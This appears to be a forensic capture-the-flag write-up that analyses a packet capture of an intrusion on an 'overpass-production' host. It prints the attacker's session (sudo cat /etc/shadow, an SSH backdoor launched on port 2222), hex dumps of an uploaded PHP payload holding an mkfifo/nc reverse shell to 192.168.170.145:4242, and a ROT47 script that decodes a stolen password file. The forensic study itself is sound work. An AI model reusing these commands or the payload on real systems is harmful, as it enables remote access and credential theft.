james@overpass-production:~$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
|        .. .     |
|       .  +      |
|      o   .=.    |
|     . o  o+.    |
|      + S +.     |
|     =.o %.      |
|    ..*.% =.     |
|    .+.X+*.+     |
|   .oo=++=Eo.    |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
cZHD
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib
ssh-rsa
w(-z
^%B|
^f& 
c|#P
 q&{
ssh-rsa
IFw1
?NK2
@Y!!
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib

WE CHECK WHETHER THE ATTACKER USED cat TO DISPLAY OR READ THEIR REVERSE SHELL SCRIPT; IT SEEMS THEY DID NOT. THE ONLY cat SEEN IS ON .overpass (cat .overpass, content: ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.):






┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings | grep cat
Running as user "root" and group "root". This could be dangerous.
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
Your identification has been saved in id_rsa.
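Added example, not part of the original notes: the .overpass blob the attacker read with cat is the Overpass password store, which is obfuscated with ROT47 (an assumption based on the blob's character set and the earlier Overpass machine; the decode producing well-formed JSON confirms it). Decoding it is the quickest way to explain the password the attacker later typed at the sudo prompt. The blob is copied verbatim from the output above; no other input is assumed.

```python
import json


def rot47(text: str) -> str:
    """ROT47: rotate every printable ASCII character (0x21..0x7E) by 47 within
    that 94-character range. The transform is its own inverse, so the same
    function encodes and decodes."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)  # whitespace and non-ASCII pass through untouched
    return "".join(out)


# Exact blob seen in the capture after `cat .overpass` (copied from the notes above).
OVERPASS_BLOB = ',LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.'


def decode_overpass_store(blob: str) -> list:
    """Deobfuscate an .overpass file and parse the JSON list of
    {"name": ..., "pass": ...} entries it contains."""
    return json.loads(rot47(blob))


def sudo_candidates(blob: str) -> list:
    """Passwords a responder should test against the sudo prompt the attacker
    answered later in the same session."""
    return [entry["pass"] for entry in decode_overpass_store(blob)]


if __name__ == "__main__":
    for entry in decode_overpass_store(OVERPASS_BLOB):
        print(f'{entry["name"]}: {entry["pass"]}')
```

Because ROT47 is an involution, the same function recovers the plaintext; the decoded store is a JSON list, so anything that is not valid JSON after decoding means the file was not ROT47 after all.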











WE FILTER ON THE WORD payload TO SEE ITS CONTENT. WHAT STANDS OUT IS THAT IT REMOVES /tmp/f AND CREATES A NAMED PIPE (mkfifo) THERE: THAT IS THE START OF THE CLASSIC mkfifo/nc REVERSE SHELL ONE-LINER, NOT A PRIVILEGE ESCALATION:






┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 "payload"

Running as user "root" and group "root". This could be dangerous.
02b0  6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68   name="payload.ph
02c0  70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65   p"..Content-Type
02d0  3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d   : application/x-
02e0  70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0  63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300  69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
--
0110  65 20 66 69 6c 65 20 70 61 79 6c 6f 61 64 2e 70   e file payload.p
0120  68 70 20 68 61 73 20 62 65 65 6e 20 75 70 6c 6f   hp has been uplo
0130  61 64 65 64 2e                                    aded.
0000  00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00   ..)n....)..H..E.
0010  00 34 0a 2f 40 00 40 06 5a 13 c0 a8 aa 91 c0 a8   .4./@.@.Z.......
0020  aa 9f ba 76 00 50 9e c3 76 b3 3a 0d 13 1a 80 10   ...v.P..v.:.....
--
02d0  72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70   ref="payload.php
02e0  22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61   ">payload.php</a
02f0  3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d   ></td><td align=
0300  22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d   "right">2020-07-
0310  32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c   21 20:34  </td><
0320  74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22   td align="right"
0330  3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e   > 99 </td><td>&n








NOW WE FILTER ON .php, WHICH WE KNOW IS THE PAYLOAD'S EXTENSION:




┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"              

Running as user "root" and group "root". This could be dangerous.
0390  74 68 69 6e 67 20 61 62 6f 75 74 20 70 68 70 20   thing about php 
03a0  65 79 65 20 65 6e 20 65 79 65 3f 20 2d 2d 3e 0a   eye en eye? -->.
03b0  20 20 20 20 20 20 3c 21 2d 2d 20 54 4f 44 4f 20         <!-- TODO 
03c0  61 64 64 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20   add downloading 
03d0  6f 66 20 79 6f 75 72 20 6f 76 65 72 70 61 73 73   of your overpass
03e0  20 66 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20    files -->.     
--
0400  70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f   pload.php" metho
0410  64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65   d="post" enctype
0420  3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d   ="multipart/form
0430  2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20   -data">.        
0440  3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d   <div class="form
0450  45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72   Elem"><label for
--
0050  65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48   ent/upload.php H
0060  54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31   TTP/1.1..Host: 1
0070  39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a   92.168.170.159..
0080  55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69   User-Agent: Mozi
0090  6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69   lla/5.0 (X11; Li
00a0  6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36   nux x86_64; rv:6
--
02e0  70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65   php....<?php exe
02f0  63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66   c("rm /tmp/f;mkf
0300  69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f   ifo /tmp/f;cat /
0310  74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69   tmp/f|/bin/sh -i
0320  20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38    2>&1|nc 192.168
0330  2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f   .170.145 4242 >/
--
02d0  72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70   ref="payload.php
02e0  22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61   ">payload.php</a
02f0  3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d   ></td><td align=
0300  22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d   "right">2020-07-
0310  32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c   21 20:34  </td><
0320  74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22   td align="right"
0330  3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e   > 99 </td><td>&n
--
0060  61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d   ad.php HTTP/1.1.
0070  0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31   .Host: 192.168.1
0080  37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65   70.159..User-Age
0090  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20   nt: Mozilla/5.0 
00a0  28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f   (X11; Linux x86_
